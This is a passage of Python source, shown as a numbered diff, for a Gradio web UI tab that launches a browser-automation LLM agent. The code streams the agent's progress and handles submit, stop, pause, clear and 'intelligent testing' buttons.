window_h = int(get_browser_setting("window_h", 1100))
|
| 404 |
+
cdp_url = get_browser_setting("cdp_url") or None
|
| 405 |
+
wss_url = get_browser_setting("wss_url") or None
|
| 406 |
+
save_recording_path = get_browser_setting("save_recording_path") or None
|
| 407 |
+
save_trace_path = get_browser_setting("save_trace_path") or None
|
| 408 |
+
save_agent_history_path = get_browser_setting(
|
| 409 |
+
"save_agent_history_path", "./tmp/agent_history"
|
| 410 |
+
)
|
| 411 |
+
save_download_path = get_browser_setting("save_download_path", "./tmp/downloads")
|
| 412 |
+
|
| 413 |
+
stream_vw = 70
|
| 414 |
+
stream_vh = int(70 * window_h // window_w)
|
| 415 |
+
|
| 416 |
+
os.makedirs(save_agent_history_path, exist_ok=True)
|
| 417 |
+
if save_recording_path:
|
| 418 |
+
os.makedirs(save_recording_path, exist_ok=True)
|
| 419 |
+
if save_trace_path:
|
| 420 |
+
os.makedirs(save_trace_path, exist_ok=True)
|
| 421 |
+
if save_download_path:
|
| 422 |
+
os.makedirs(save_download_path, exist_ok=True)
|
| 423 |
+
|
| 424 |
+
# --- 2. Initialize LLM ---
|
| 425 |
+
main_llm = await _initialize_llm(
|
| 426 |
+
llm_provider_name,
|
| 427 |
+
llm_model_name,
|
| 428 |
+
llm_temperature,
|
| 429 |
+
llm_base_url,
|
| 430 |
+
llm_api_key,
|
| 431 |
+
ollama_num_ctx if llm_provider_name == "ollama" else None,
|
| 432 |
+
)
|
| 433 |
+
|
| 434 |
+
# Pass the webui_manager instance to the callback when wrapping it
|
| 435 |
+
async def ask_callback_wrapper(
|
| 436 |
+
query: str, browser_context: BrowserContext
|
| 437 |
+
) -> Dict[str, Any]:
|
| 438 |
+
return await _ask_assistant_callback(webui_manager, query, browser_context)
|
| 439 |
+
|
| 440 |
+
if not webui_manager.bu_controller:
|
| 441 |
+
webui_manager.bu_controller = CustomController(
|
| 442 |
+
ask_assistant_callback=ask_callback_wrapper
|
| 443 |
+
)
|
| 444 |
+
await webui_manager.bu_controller.setup_mcp_client(mcp_server_config)
|
| 445 |
+
|
| 446 |
+
# --- 4. Initialize Browser and Context ---
|
| 447 |
+
should_close_browser_on_finish = not keep_browser_open
|
| 448 |
+
|
| 449 |
+
try:
|
| 450 |
+
# Close existing resources if not keeping open
|
| 451 |
+
if not keep_browser_open:
|
| 452 |
+
if webui_manager.bu_browser_context:
|
| 453 |
+
logger.info("Closing previous browser context.")
|
| 454 |
+
await webui_manager.bu_browser_context.close()
|
| 455 |
+
webui_manager.bu_browser_context = None
|
| 456 |
+
if webui_manager.bu_browser:
|
| 457 |
+
logger.info("Closing previous browser.")
|
| 458 |
+
await webui_manager.bu_browser.close()
|
| 459 |
+
webui_manager.bu_browser = None
|
| 460 |
+
|
| 461 |
+
# Create Browser if needed
|
| 462 |
+
if not webui_manager.bu_browser:
|
| 463 |
+
logger.info("Launching new browser instance.")
|
| 464 |
+
extra_args = []
|
| 465 |
+
if use_own_browser:
|
| 466 |
+
browser_binary_path = os.getenv("BROWSER_PATH", None) or browser_binary_path
|
| 467 |
+
if browser_binary_path == "":
|
| 468 |
+
browser_binary_path = None
|
| 469 |
+
browser_user_data = browser_user_data_dir or os.getenv("BROWSER_USER_DATA", None)
|
| 470 |
+
if browser_user_data:
|
| 471 |
+
extra_args += [f"--user-data-dir={browser_user_data}"]
|
| 472 |
+
else:
|
| 473 |
+
browser_binary_path = None
|
| 474 |
+
|
| 475 |
+
webui_manager.bu_browser = CustomBrowser(
|
| 476 |
+
config=BrowserConfig(
|
| 477 |
+
headless=headless,
|
| 478 |
+
disable_security=disable_security,
|
| 479 |
+
browser_binary_path=browser_binary_path,
|
| 480 |
+
extra_browser_args=extra_args,
|
| 481 |
+
wss_url=wss_url,
|
| 482 |
+
cdp_url=cdp_url,
|
| 483 |
+
new_context_config=BrowserContextConfig(
|
| 484 |
+
window_width=window_w,
|
| 485 |
+
window_height=window_h,
|
| 486 |
+
)
|
| 487 |
+
)
|
| 488 |
+
)
|
| 489 |
+
|
| 490 |
+
# Create Context if needed
|
| 491 |
+
if not webui_manager.bu_browser_context:
|
| 492 |
+
logger.info("Creating new browser context.")
|
| 493 |
+
context_config = BrowserContextConfig(
|
| 494 |
+
trace_path=save_trace_path if save_trace_path else None,
|
| 495 |
+
save_recording_path=save_recording_path
|
| 496 |
+
if save_recording_path
|
| 497 |
+
else None,
|
| 498 |
+
save_downloads_path=save_download_path if save_download_path else None,
|
| 499 |
+
window_height=window_h,
|
| 500 |
+
window_width=window_w,
|
| 501 |
+
)
|
| 502 |
+
if not webui_manager.bu_browser:
|
| 503 |
+
raise ValueError("Browser not initialized, cannot create context.")
|
| 504 |
+
webui_manager.bu_browser_context = (
|
| 505 |
+
await webui_manager.bu_browser.new_context(config=context_config)
|
| 506 |
+
)
|
| 507 |
+
|
| 508 |
+
# --- 5. Initialize or Update Agent ---
|
| 509 |
+
webui_manager.bu_agent_task_id = str(uuid.uuid4()) # New ID for this task run
|
| 510 |
+
os.makedirs(
|
| 511 |
+
os.path.join(save_agent_history_path, webui_manager.bu_agent_task_id),
|
| 512 |
+
exist_ok=True,
|
| 513 |
+
)
|
| 514 |
+
history_file = os.path.join(
|
| 515 |
+
save_agent_history_path,
|
| 516 |
+
webui_manager.bu_agent_task_id,
|
| 517 |
+
f"{webui_manager.bu_agent_task_id}.json",
|
| 518 |
+
)
|
| 519 |
+
gif_path = os.path.join(
|
| 520 |
+
save_agent_history_path,
|
| 521 |
+
webui_manager.bu_agent_task_id,
|
| 522 |
+
f"{webui_manager.bu_agent_task_id}.gif",
|
| 523 |
+
)
|
| 524 |
+
|
| 525 |
+
# Pass the webui_manager to callbacks when wrapping them
|
| 526 |
+
async def step_callback_wrapper(
|
| 527 |
+
state: BrowserState, output: AgentOutput, step_num: int
|
| 528 |
+
):
|
| 529 |
+
await _handle_new_step(webui_manager, state, output, step_num)
|
| 530 |
+
|
| 531 |
+
def done_callback_wrapper(history: AgentHistoryList):
|
| 532 |
+
_handle_done(webui_manager, history)
|
| 533 |
+
|
| 534 |
+
if not webui_manager.bu_agent:
|
| 535 |
+
logger.info(f"Initializing new agent for task: {task}")
|
| 536 |
+
if not webui_manager.bu_browser or not webui_manager.bu_browser_context:
|
| 537 |
+
raise ValueError(
|
| 538 |
+
"Browser or Context not initialized, cannot create agent."
|
| 539 |
+
)
|
| 540 |
+
webui_manager.bu_agent = BrowserUseAgent(
|
| 541 |
+
task=task,
|
| 542 |
+
llm=main_llm,
|
| 543 |
+
browser=webui_manager.bu_browser,
|
| 544 |
+
browser_context=webui_manager.bu_browser_context,
|
| 545 |
+
controller=webui_manager.bu_controller,
|
| 546 |
+
register_new_step_callback=step_callback_wrapper,
|
| 547 |
+
register_done_callback=done_callback_wrapper,
|
| 548 |
+
use_vision=use_vision,
|
| 549 |
+
override_system_message=override_system_prompt,
|
| 550 |
+
extend_system_message=extend_system_prompt,
|
| 551 |
+
max_input_tokens=max_input_tokens,
|
| 552 |
+
max_actions_per_step=max_actions,
|
| 553 |
+
tool_calling_method=tool_calling_method,
|
| 554 |
+
planner_llm=planner_llm,
|
| 555 |
+
use_vision_for_planner=planner_use_vision if planner_llm else False,
|
| 556 |
+
source="webui",
|
| 557 |
+
)
|
| 558 |
+
webui_manager.bu_agent.state.agent_id = webui_manager.bu_agent_task_id
|
| 559 |
+
webui_manager.bu_agent.settings.generate_gif = gif_path
|
| 560 |
+
else:
|
| 561 |
+
webui_manager.bu_agent.state.agent_id = webui_manager.bu_agent_task_id
|
| 562 |
+
webui_manager.bu_agent.add_new_task(task)
|
| 563 |
+
webui_manager.bu_agent.settings.generate_gif = gif_path
|
| 564 |
+
webui_manager.bu_agent.browser = webui_manager.bu_browser
|
| 565 |
+
webui_manager.bu_agent.browser_context = webui_manager.bu_browser_context
|
| 566 |
+
webui_manager.bu_agent.controller = webui_manager.bu_controller
|
| 567 |
+
|
| 568 |
+
# --- 6. Run Agent Task and Stream Updates ---
|
| 569 |
+
agent_run_coro = webui_manager.bu_agent.run(max_steps=max_steps)
|
| 570 |
+
agent_task = asyncio.create_task(agent_run_coro)
|
| 571 |
+
webui_manager.bu_current_task = agent_task # Store the task
|
| 572 |
+
|
| 573 |
+
last_chat_len = len(webui_manager.bu_chat_history)
|
| 574 |
+
while not agent_task.done():
|
| 575 |
+
is_paused = webui_manager.bu_agent.state.paused
|
| 576 |
+
is_stopped = webui_manager.bu_agent.state.stopped
|
| 577 |
+
|
| 578 |
+
# Check for pause state
|
| 579 |
+
if is_paused:
|
| 580 |
+
yield {
|
| 581 |
+
pause_resume_button_comp: gr.update(
|
| 582 |
+
value="▶️ Resume", interactive=True
|
| 583 |
+
),
|
| 584 |
+
stop_button_comp: gr.update(interactive=True),
|
| 585 |
+
}
|
| 586 |
+
# Wait until pause is released or task is stopped/done
|
| 587 |
+
while is_paused and not agent_task.done():
|
| 588 |
+
# Re-check agent state in loop
|
| 589 |
+
is_paused = webui_manager.bu_agent.state.paused
|
| 590 |
+
is_stopped = webui_manager.bu_agent.state.stopped
|
| 591 |
+
if is_stopped: # Stop signal received while paused
|
| 592 |
+
break
|
| 593 |
+
await asyncio.sleep(0.2)
|
| 594 |
+
|
| 595 |
+
if (
|
| 596 |
+
agent_task.done() or is_stopped
|
| 597 |
+
): # If stopped or task finished while paused
|
| 598 |
+
break
|
| 599 |
+
|
| 600 |
+
# If resumed, yield UI update
|
| 601 |
+
yield {
|
| 602 |
+
pause_resume_button_comp: gr.update(
|
| 603 |
+
value="⏸️ Pause", interactive=True
|
| 604 |
+
),
|
| 605 |
+
run_button_comp: gr.update(
|
| 606 |
+
value="⏳ Running...", interactive=False
|
| 607 |
+
),
|
| 608 |
+
}
|
| 609 |
+
|
| 610 |
+
# Check if agent stopped itself or stop button was pressed (which sets agent.state.stopped)
|
| 611 |
+
if is_stopped:
|
| 612 |
+
logger.info("Agent has stopped (internally or via stop button).")
|
| 613 |
+
if not agent_task.done():
|
| 614 |
+
# Ensure the task coroutine finishes if agent just set flag
|
| 615 |
+
try:
|
| 616 |
+
await asyncio.wait_for(
|
| 617 |
+
agent_task, timeout=1.0
|
| 618 |
+
) # Give it a moment to exit run()
|
| 619 |
+
except asyncio.TimeoutError:
|
| 620 |
+
logger.warning(
|
| 621 |
+
"Agent task did not finish quickly after stop signal, cancelling."
|
| 622 |
+
)
|
| 623 |
+
agent_task.cancel()
|
| 624 |
+
except Exception: # Catch task exceptions if it errors on stop
|
| 625 |
+
pass
|
| 626 |
+
break # Exit the streaming loop
|
| 627 |
+
|
| 628 |
+
# Check if agent is asking for help (via response_event)
|
| 629 |
+
update_dict = {}
|
| 630 |
+
if webui_manager.bu_response_event is not None:
|
| 631 |
+
update_dict = {
|
| 632 |
+
user_input_comp: gr.update(
|
| 633 |
+
placeholder="Agent needs help. Enter response and submit.",
|
| 634 |
+
interactive=True,
|
| 635 |
+
),
|
| 636 |
+
run_button_comp: gr.update(
|
| 637 |
+
value="✔️ Submit Response", interactive=True
|
| 638 |
+
),
|
| 639 |
+
pause_resume_button_comp: gr.update(interactive=False),
|
| 640 |
+
stop_button_comp: gr.update(interactive=False),
|
| 641 |
+
chatbot_comp: gr.update(value=webui_manager.bu_chat_history),
|
| 642 |
+
}
|
| 643 |
+
last_chat_len = len(webui_manager.bu_chat_history)
|
| 644 |
+
yield update_dict
|
| 645 |
+
# Wait until response is submitted or task finishes
|
| 646 |
+
await webui_manager.bu_response_event.wait()
|
| 647 |
+
|
| 648 |
+
# Restore UI after response submitted or if task ended unexpectedly
|
| 649 |
+
if not agent_task.done():
|
| 650 |
+
yield {
|
| 651 |
+
user_input_comp: gr.update(
|
| 652 |
+
placeholder="Agent is running...", interactive=False
|
| 653 |
+
),
|
| 654 |
+
run_button_comp: gr.update(
|
| 655 |
+
value="⏳ Running...", interactive=False
|
| 656 |
+
),
|
| 657 |
+
pause_resume_button_comp: gr.update(interactive=True),
|
| 658 |
+
stop_button_comp: gr.update(interactive=True),
|
| 659 |
+
}
|
| 660 |
+
else:
|
| 661 |
+
break # Task finished while waiting for response
|
| 662 |
+
|
| 663 |
+
# Update Chatbot if new messages arrived via callbacks
|
| 664 |
+
if len(webui_manager.bu_chat_history) > last_chat_len:
|
| 665 |
+
update_dict[chatbot_comp] = gr.update(
|
| 666 |
+
value=webui_manager.bu_chat_history
|
| 667 |
+
)
|
| 668 |
+
last_chat_len = len(webui_manager.bu_chat_history)
|
| 669 |
+
|
| 670 |
+
# Update Browser View
|
| 671 |
+
if headless and webui_manager.bu_browser_context:
|
| 672 |
+
try:
|
| 673 |
+
screenshot_b64 = (
|
| 674 |
+
await webui_manager.bu_browser_context.take_screenshot()
|
| 675 |
+
)
|
| 676 |
+
if screenshot_b64:
|
| 677 |
+
html_content = f'<img src="data:image/jpeg;base64,{screenshot_b64}" style="width:{stream_vw}vw; height:{stream_vh}vh ; border:1px solid #ccc;">'
|
| 678 |
+
update_dict[browser_view_comp] = gr.update(
|
| 679 |
+
value=html_content, visible=True
|
| 680 |
+
)
|
| 681 |
+
else:
|
| 682 |
+
html_content = f"<h1 style='width:{stream_vw}vw; height:{stream_vh}vh'>Waiting for browser session...</h1>"
|
| 683 |
+
update_dict[browser_view_comp] = gr.update(
|
| 684 |
+
value=html_content, visible=True
|
| 685 |
+
)
|
| 686 |
+
except Exception as e:
|
| 687 |
+
logger.debug(f"Failed to capture screenshot: {e}")
|
| 688 |
+
update_dict[browser_view_comp] = gr.update(
|
| 689 |
+
value="<div style='...'>Error loading view...</div>",
|
| 690 |
+
visible=True,
|
| 691 |
+
)
|
| 692 |
+
else:
|
| 693 |
+
update_dict[browser_view_comp] = gr.update(visible=False)
|
| 694 |
+
|
| 695 |
+
# Yield accumulated updates
|
| 696 |
+
if update_dict:
|
| 697 |
+
yield update_dict
|
| 698 |
+
|
| 699 |
+
await asyncio.sleep(0.1) # Polling interval
|
| 700 |
+
|
| 701 |
+
# --- 7. Task Finalization ---
|
| 702 |
+
webui_manager.bu_agent.state.paused = False
|
| 703 |
+
webui_manager.bu_agent.state.stopped = False
|
| 704 |
+
final_update = {}
|
| 705 |
+
try:
|
| 706 |
+
logger.info("Agent task completing...")
|
| 707 |
+
# Await the task ensure completion and catch exceptions if not already caught
|
| 708 |
+
if not agent_task.done():
|
| 709 |
+
await agent_task # Retrieve result/exception
|
| 710 |
+
elif agent_task.exception(): # Check if task finished with exception
|
| 711 |
+
agent_task.result() # Raise the exception to be caught below
|
| 712 |
+
logger.info("Agent task completed processing.")
|
| 713 |
+
|
| 714 |
+
logger.info(f"Explicitly saving agent history to: {history_file}")
|
| 715 |
+
webui_manager.bu_agent.save_history(history_file)
|
| 716 |
+
|
| 717 |
+
if os.path.exists(history_file):
|
| 718 |
+
final_update[history_file_comp] = gr.File(value=history_file)
|
| 719 |
+
|
| 720 |
+
if gif_path and os.path.exists(gif_path):
|
| 721 |
+
logger.info(f"GIF found at: {gif_path}")
|
| 722 |
+
final_update[gif_comp] = gr.Image(value=gif_path)
|
| 723 |
+
|
| 724 |
+
except asyncio.CancelledError:
|
| 725 |
+
logger.info("Agent task was cancelled.")
|
| 726 |
+
if not any(
|
| 727 |
+
"Cancelled" in msg.get("content", "")
|
| 728 |
+
for msg in webui_manager.bu_chat_history
|
| 729 |
+
if msg.get("role") == "assistant"
|
| 730 |
+
):
|
| 731 |
+
webui_manager.bu_chat_history.append(
|
| 732 |
+
{"role": "assistant", "content": "**Task Cancelled**."}
|
| 733 |
+
)
|
| 734 |
+
final_update[chatbot_comp] = gr.update(value=webui_manager.bu_chat_history)
|
| 735 |
+
except Exception as e:
|
| 736 |
+
logger.error(f"Error during agent execution: {e}", exc_info=True)
|
| 737 |
+
error_message = (
|
| 738 |
+
f"**Agent Execution Error:**\n```\n{type(e).__name__}: {e}\n```"
|
| 739 |
+
)
|
| 740 |
+
if not any(
|
| 741 |
+
error_message in msg.get("content", "")
|
| 742 |
+
for msg in webui_manager.bu_chat_history
|
| 743 |
+
if msg.get("role") == "assistant"
|
| 744 |
+
):
|
| 745 |
+
webui_manager.bu_chat_history.append(
|
| 746 |
+
{"role": "assistant", "content": error_message}
|
| 747 |
+
)
|
| 748 |
+
final_update[chatbot_comp] = gr.update(value=webui_manager.bu_chat_history)
|
| 749 |
+
gr.Error(f"Agent execution failed: {e}")
|
| 750 |
+
|
| 751 |
+
finally:
|
| 752 |
+
webui_manager.bu_current_task = None # Clear the task reference
|
| 753 |
+
|
| 754 |
+
# Close browser/context if requested
|
| 755 |
+
if should_close_browser_on_finish:
|
| 756 |
+
if webui_manager.bu_browser_context:
|
| 757 |
+
logger.info("Closing browser context after task.")
|
| 758 |
+
await webui_manager.bu_browser_context.close()
|
| 759 |
+
webui_manager.bu_browser_context = None
|
| 760 |
+
if webui_manager.bu_browser:
|
| 761 |
+
logger.info("Closing browser after task.")
|
| 762 |
+
await webui_manager.bu_browser.close()
|
| 763 |
+
webui_manager.bu_browser = None
|
| 764 |
+
|
| 765 |
+
# --- 8. Final UI Update ---
|
| 766 |
+
final_update.update(
|
| 767 |
+
{
|
| 768 |
+
user_input_comp: gr.update(
|
| 769 |
+
value="",
|
| 770 |
+
interactive=True,
|
| 771 |
+
placeholder="Enter your next task...",
|
| 772 |
+
),
|
| 773 |
+
run_button_comp: gr.update(value="▶️ Submit Task", interactive=True),
|
| 774 |
+
stop_button_comp: gr.update(value="⏹️ Stop", interactive=False),
|
| 775 |
+
pause_resume_button_comp: gr.update(
|
| 776 |
+
value="⏸️ Pause", interactive=False
|
| 777 |
+
),
|
| 778 |
+
clear_button_comp: gr.update(interactive=True),
|
| 779 |
+
# Ensure final chat history is shown
|
| 780 |
+
chatbot_comp: gr.update(value=webui_manager.bu_chat_history),
|
| 781 |
+
}
|
| 782 |
+
)
|
| 783 |
+
yield final_update
|
| 784 |
+
|
| 785 |
+
except Exception as e:
|
| 786 |
+
# Catch errors during setup (before agent run starts)
|
| 787 |
+
logger.error(f"Error setting up agent task: {e}", exc_info=True)
|
| 788 |
+
webui_manager.bu_current_task = None # Ensure state is reset
|
| 789 |
+
yield {
|
| 790 |
+
user_input_comp: gr.update(
|
| 791 |
+
interactive=True, placeholder="Error during setup. Enter task..."
|
| 792 |
+
),
|
| 793 |
+
run_button_comp: gr.update(value="▶️ Submit Task", interactive=True),
|
| 794 |
+
stop_button_comp: gr.update(value="⏹️ Stop", interactive=False),
|
| 795 |
+
pause_resume_button_comp: gr.update(value="⏸️ Pause", interactive=False),
|
| 796 |
+
clear_button_comp: gr.update(interactive=True),
|
| 797 |
+
chatbot_comp: gr.update(
|
| 798 |
+
value=webui_manager.bu_chat_history
|
| 799 |
+
+ [{"role": "assistant", "content": f"**Setup Error:** {e}"}]
|
| 800 |
+
),
|
| 801 |
+
}
|
| 802 |
+
|
| 803 |
+
|
| 804 |
+
# --- Button Click Handlers --- (Need access to webui_manager)
|
| 805 |
+
|
| 806 |
+
|
| 807 |
+
async def handle_submit(
    webui_manager: WebuiManager, components: Dict[gr.components.Component, Any]
):
    """Handles clicks on the main 'Submit' button.

    Dispatches to one of three cases:
    1. The agent is waiting for human assistance -> deliver the user's text
       through the response event and lock the input.
    2. A task is already running -> warn and change nothing.
    3. No task running -> start a new task and stream its UI updates.

    Args:
        webui_manager: Shared manager holding agent/task/chat state.
        components: Mapping of Gradio components to their current values.

    Yields:
        Dicts of component -> gr.update() for the UI.
    """
    user_input_comp = webui_manager.get_component_by_id("browser_use_agent.user_input")
    # Fix: Gradio may deliver None for an empty Textbox; calling .strip() on
    # None raised AttributeError. Coerce to "" before stripping.
    user_input_value = (components.get(user_input_comp) or "").strip()

    # Check if waiting for user assistance
    if webui_manager.bu_response_event and not webui_manager.bu_response_event.is_set():
        logger.info(f"User submitted assistance: {user_input_value}")
        webui_manager.bu_user_help_response = (
            user_input_value if user_input_value else "User provided no text response."
        )
        webui_manager.bu_response_event.set()
        # UI updates handled by the main loop reacting to the event being set
        yield {
            user_input_comp: gr.update(
                value="",
                interactive=False,
                placeholder="Waiting for agent to continue...",
            ),
            webui_manager.get_component_by_id(
                "browser_use_agent.run_button"
            ): gr.update(value="⏳ Running...", interactive=False),
        }
    # Check if a task is currently running (using _current_task)
    elif webui_manager.bu_current_task and not webui_manager.bu_current_task.done():
        logger.warning(
            "Submit button clicked while agent is already running and not asking for help."
        )
        gr.Info("Agent is currently running. Please wait or use Stop/Pause.")
        yield {}  # No change
    else:
        # Handle submission for a new task
        logger.info("Submit button clicked for new task.")
        # Use async generator to stream updates from run_agent_task
        async for update in run_agent_task(webui_manager, components):
            yield update
|
| 845 |
+
|
| 846 |
+
|
| 847 |
+
async def handle_stop(webui_manager: WebuiManager):
    """Handles clicks on the 'Stop' button.

    Signals the running agent to stop via its state flags and returns
    component updates reflecting the stopping/idle UI state.
    """
    logger.info("Stop button clicked.")
    agent = webui_manager.bu_agent
    task = webui_manager.bu_current_task

    comp = webui_manager.get_component_by_id
    if agent and task and not task.done():
        # Signal the agent to stop by setting its internal flags.
        agent.state.stopped = True
        agent.state.paused = False  # A stopped agent must not remain paused
        return {
            comp("browser_use_agent.stop_button"): gr.update(
                interactive=False, value="⏹️ Stopping..."
            ),
            comp("browser_use_agent.pause_resume_button"): gr.update(
                interactive=False
            ),
            comp("browser_use_agent.run_button"): gr.update(interactive=False),
        }

    logger.warning("Stop clicked but agent is not running or task is already done.")
    # Reset UI just in case it's stuck
    return {
        comp("browser_use_agent.run_button"): gr.update(interactive=True),
        comp("browser_use_agent.stop_button"): gr.update(interactive=False),
        comp("browser_use_agent.pause_resume_button"): gr.update(interactive=False),
        comp("browser_use_agent.clear_button"): gr.update(interactive=True),
    }
|
| 885 |
+
|
| 886 |
+
|
| 887 |
+
async def handle_pause_resume(webui_manager: WebuiManager):
    """Handles clicks on the 'Pause/Resume' button.

    Toggles the running agent between paused and resumed states and returns
    an optimistic button-label update; the main polling loop reflects the
    real state afterwards.
    """
    agent = webui_manager.bu_agent
    task = webui_manager.bu_current_task
    button = webui_manager.get_component_by_id(
        "browser_use_agent.pause_resume_button"
    )

    # Guard clause: nothing to toggle unless a live agent task exists.
    if not (agent and task and not task.done()):
        logger.warning(
            "Pause/Resume clicked but agent is not running or doesn't support state."
        )
        return {}  # No change

    if agent.state.paused:
        logger.info("Resume button clicked.")
        agent.resume()
        # UI update happens in main loop
        return {button: gr.update(value="⏸️ Pause", interactive=True)}  # Optimistic update

    logger.info("Pause button clicked.")
    agent.pause()
    return {button: gr.update(value="▶️ Resume", interactive=True)}  # Optimistic update
|
| 915 |
+
|
| 916 |
+
|
| 917 |
+
async def handle_clear(webui_manager: WebuiManager):
    """Handles clicks on the 'Clear' button.

    Cancels any running task, closes the MCP client, resets all agent/chat
    state stored in the manager, and returns component updates that restore
    the tab to its initial state.

    Args:
        webui_manager: Shared manager holding agent/task/chat state.

    Returns:
        Dict of component -> gr.update() resetting the UI.
    """
    logger.info("Clear button clicked.")

    # Stop any running task first
    task = webui_manager.bu_current_task
    if task and not task.done():
        logger.info("Clearing requires stopping the current task.")
        # Fix: guard against a missing agent reference — calling .stop() on
        # None would raise AttributeError and abort the clear operation.
        if webui_manager.bu_agent:
            webui_manager.bu_agent.stop()
        task.cancel()
        try:
            await asyncio.wait_for(task, timeout=2.0)  # Wait briefly
        except (asyncio.CancelledError, asyncio.TimeoutError):
            pass
        except Exception as e:
            logger.warning(f"Error stopping task on clear: {e}")
    webui_manager.bu_current_task = None

    if webui_manager.bu_controller:
        await webui_manager.bu_controller.close_mcp_client()
        webui_manager.bu_controller = None
    webui_manager.bu_agent = None

    # Reset state stored in manager
    webui_manager.bu_chat_history = []
    webui_manager.bu_response_event = None
    webui_manager.bu_user_help_response = None
    webui_manager.bu_agent_task_id = None

    logger.info("Agent state and browser resources cleared.")

    # Reset UI components
    return {
        webui_manager.get_component_by_id("browser_use_agent.chatbot"): gr.update(
            value=[]
        ),
        webui_manager.get_component_by_id("browser_use_agent.user_input"): gr.update(
            value="", placeholder="Enter your task here..."
        ),
        webui_manager.get_component_by_id(
            "browser_use_agent.agent_history_file"
        ): gr.update(value=None),
        webui_manager.get_component_by_id("browser_use_agent.recording_gif"): gr.update(
            value=None
        ),
        webui_manager.get_component_by_id("browser_use_agent.browser_view"): gr.update(
            value="<div style='...'>Browser Cleared</div>"
        ),
        webui_manager.get_component_by_id("browser_use_agent.run_button"): gr.update(
            value="▶️ Submit Task", interactive=True
        ),
        webui_manager.get_component_by_id("browser_use_agent.stop_button"): gr.update(
            interactive=False
        ),
        webui_manager.get_component_by_id(
            "browser_use_agent.pause_resume_button"
        ): gr.update(value="⏸️ Pause", interactive=False),
        webui_manager.get_component_by_id("browser_use_agent.clear_button"): gr.update(
            interactive=True
        ),
    }
|
| 978 |
+
|
| 979 |
+
|
| 980 |
+
# --- Tab Creation Function ---
|
| 981 |
+
|
| 982 |
+
|
| 983 |
+
def create_browser_use_agent_tab(webui_manager: WebuiManager):
    """
    Create the run agent tab, defining UI, state, and handlers.
    """
    # Prepare the manager's per-tab state (chat history, task refs, etc.).
    webui_manager.init_browser_use_agent()

    # --- Define UI Components ---
    tab_components = {}
    with gr.Column():
        # Chat transcript between the user and the agent; the callable
        # reloads history from the manager each render.
        chatbot = gr.Chatbot(
            lambda: webui_manager.bu_chat_history,  # Load history dynamically
            elem_id="browser_use_chatbot",
            label="Agent Interaction",
            type="messages",
            height=600,
            show_copy_button=True,
        )
        # Doubles as task entry and as the reply box when the agent asks
        # the user for help mid-run.
        user_input = gr.Textbox(
            label="Your Task or Response",
            placeholder="Enter your task here or provide assistance when asked.",
            lines=3,
            interactive=True,
            elem_id="user_input",
        )
        with gr.Row():
            stop_button = gr.Button(
                "⏹️ Stop", interactive=False, variant="stop", scale=2
            )
            pause_resume_button = gr.Button(
                "⏸️ Pause", interactive=False, variant="secondary", scale=2, visible=True
            )
            clear_button = gr.Button(
                "🗑️ Clear", interactive=True, variant="secondary", scale=2
            )
            run_button = gr.Button("▶️ Submit Task", variant="primary", scale=3)

        # Intelligent Testing Section
        gr.Markdown("### 🧠 Intelligent Testing Features")
        with gr.Row():
            intelligent_form_test_btn = gr.Button(
                "🔍 Smart Form Testing",
                variant="secondary",
                scale=2,
                interactive=True
            )
            intelligent_credential_test_btn = gr.Button(
                "🔐 Smart Credential Testing",
                variant="secondary",
                scale=2,
                interactive=True
            )
            ai_analysis_btn = gr.Button(
                "🤔 AI Page Analysis",
                variant="secondary",
                scale=2,
                interactive=True
            )
        with gr.Row():
            comprehensive_test_btn = gr.Button(
                "🎯 Comprehensive Intelligent Testing",
                variant="primary",
                scale=3,
                interactive=True
            )

        # Live screenshot stream; only shown when the browser runs headless.
        browser_view = gr.HTML(
            value="<div style='width:100%; height:50vh; display:flex; justify-content:center; align-items:center; border:1px solid #ccc; background-color:#f0f0f0;'><p>Browser View (Requires Headless=True)</p></div>",
            label="Browser Live View",
            elem_id="browser_view",
            visible=False,
        )
    with gr.Column():
        gr.Markdown("### Task Outputs")
        agent_history_file = gr.File(label="Agent History JSON", interactive=False)
        recording_gif = gr.Image(
            label="Task Recording GIF",
            format="gif",
            interactive=False,
            type="filepath",
        )

        # Auto-generated PDF Report Section
        gr.Markdown("### 📊 Auto-Generated PDF Report")
        auto_pdf_report = gr.File(
            label="📄 Testing Report (PDF)",
            interactive=False,
            visible=False
        )
        auto_report_status = gr.Textbox(
            label="📊 Report Status",
            value="Report will be generated automatically after testing completion",
            interactive=False,
            visible=True
        )

    # --- Store Components in Manager ---
    tab_components.update(
        dict(
            chatbot=chatbot,
            user_input=user_input,
            clear_button=clear_button,
            run_button=run_button,
            stop_button=stop_button,
            pause_resume_button=pause_resume_button,
            intelligent_form_test_btn=intelligent_form_test_btn,
            intelligent_credential_test_btn=intelligent_credential_test_btn,
            ai_analysis_btn=ai_analysis_btn,
            comprehensive_test_btn=comprehensive_test_btn,
            agent_history_file=agent_history_file,
            recording_gif=recording_gif,
            browser_view=browser_view,
            auto_pdf_report=auto_pdf_report,
            auto_report_status=auto_report_status,
        )
    )
    webui_manager.add_components(
        "browser_use_agent", tab_components
    )  # Use "browser_use_agent" as tab_name prefix

    # All registered components are passed as inputs so handlers can read
    # settings from other tabs too; outputs are limited to this tab.
    all_managed_components = set(
        webui_manager.get_components()
    )  # Get all components known to manager
    run_tab_outputs = list(tab_components.values())

    async def submit_wrapper(
        components_dict: Dict[Component, Any],
    ) -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for handle_submit that yields its results."""
        async for update in handle_submit(webui_manager, components_dict):
            yield update

    async def stop_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for handle_stop."""
        update_dict = await handle_stop(webui_manager)
        yield update_dict

    async def pause_resume_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for handle_pause_resume."""
        update_dict = await handle_pause_resume(webui_manager)
        yield update_dict

    async def clear_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for handle_clear."""
        update_dict = await handle_clear(webui_manager)
        yield update_dict

    # Intelligent Testing Handlers
    # NOTE(review): these wrappers require an initialized agent (a regular
    # task must have run first); they report availability via chat messages.
    async def intelligent_form_test_wrapper() -> AsyncGenerator[Dict[Component, Any], None]:
        """Wrapper for intelligent form testing."""
        try:
            webui_manager.bu_chat_history.append({
                "role": "assistant",
                "content": "🔍 Starting intelligent form testing... This will discover form fields and test various scenarios automatically."
            })

            if webui_manager.bu_agent and hasattr(webui_manager.bu_agent, 'run_intelligent_form_testing'):
                result = await webui_manager.bu_agent.run_intelligent_form_testing()

                if "error" in result:
                    webui_manager.bu_chat_history.append({
                        "role": "assistant",
                        "content": f"❌ Form testing error: {result['error']}"
                    })
                else:
                    summary = result.get('summary', {})
